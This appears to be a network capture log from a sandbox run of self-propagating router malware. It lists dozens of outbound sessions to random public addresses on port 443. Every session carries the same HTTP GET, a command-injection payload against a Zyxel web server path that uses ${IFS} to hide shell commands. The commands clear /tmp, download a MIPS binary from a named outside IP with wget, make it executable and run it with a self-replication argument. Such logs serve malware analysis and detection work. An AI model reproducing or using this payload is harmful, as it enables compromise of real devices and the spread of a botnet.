                                                Jan 12, 2024 18:16:31.649347067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6584192.168.2.2345332172.2.92.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649379969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6585192.168.2.2347326184.161.212.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649419069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6586192.168.2.2356426182.134.222.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649462938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6587192.168.2.235720425.44.78.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649517059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6588192.168.2.2352780217.135.85.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649544954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6589192.168.2.2341456101.182.219.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649594069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6590192.168.2.2337736181.162.28.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649595022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6591192.168.2.2353154197.245.111.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649646044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6592192.168.2.2334022217.92.207.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649683952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6593192.168.2.2334924117.220.218.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649734020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6594192.168.2.2339878105.9.212.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649791002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6595192.168.2.23586925.129.183.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649849892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6596192.168.2.2354604117.110.54.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649861097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6597192.168.2.236073848.208.235.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649909019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6598192.168.2.2339252114.22.10.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649946928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6599192.168.2.2343446190.91.252.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.649981022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6600192.168.2.235760874.122.69.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650012016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6601192.168.2.233772498.58.214.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650052071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6602192.168.2.2346250212.119.224.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650084019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6603192.168.2.234020494.214.91.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650125980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6604192.168.2.2345200155.230.3.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650180101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6605192.168.2.2333482177.172.251.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650218964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6606192.168.2.2350168221.153.163.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650244951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6607192.168.2.2349148117.243.185.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650300026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6608192.168.2.2342382173.117.98.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650317907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6609192.168.2.2346530180.21.115.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650376081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6610192.168.2.2345864129.26.94.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650412083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6611192.168.2.2351762120.210.228.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650451899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6612192.168.2.2347236204.238.49.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650510073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6613192.168.2.234740237.239.117.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650521040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6614192.168.2.2335554131.160.153.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650552034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6615192.168.2.2355654102.214.55.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650609970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6616192.168.2.2352140202.177.129.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650640965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6617192.168.2.2337074152.86.35.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650664091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6618192.168.2.2354442122.9.73.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650706053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6619192.168.2.233438860.169.176.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650746107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6620192.168.2.236060078.127.156.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650799036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6621192.168.2.2359064222.132.26.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650834084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6622192.168.2.23334388.169.241.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650891066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6623192.168.2.235359865.248.131.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650924921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6624192.168.2.2348708222.164.105.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.650980949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6625192.168.2.235654060.39.213.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.651010990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6626192.168.2.2359368140.82.202.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.651031017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6627192.168.2.234719032.23.112.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.651091099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6628192.168.2.2333680210.32.242.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.651125908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6629192.168.2.235617099.93.198.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.651155949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6630192.168.2.2334178151.1.112.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.651217937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6631192.168.2.2337862173.159.117.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.651249886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6632192.168.2.2359762216.249.210.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.651287079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6633192.168.2.2340656187.38.254.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.651331902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6634192.168.2.2333358101.104.245.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.654465914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6635192.168.2.2343244112.247.3.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655157089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6636192.168.2.2333700189.184.201.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655193090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6637192.168.2.2347544164.228.170.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655244112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6638192.168.2.2337576219.123.28.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655261040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6639192.168.2.2353166144.41.186.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655333996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6640192.168.2.234958845.231.242.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655365944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6641192.168.2.233622861.188.234.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655381918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6642192.168.2.2336814117.251.48.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655420065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6643192.168.2.2357388101.43.73.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655468941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6644192.168.2.2355406119.45.121.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655487061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6645192.168.2.2347634141.246.250.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:31.655522108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6646192.168.2.236023225.195.223.111443
                                                TimestampBytes transferredDirectionData
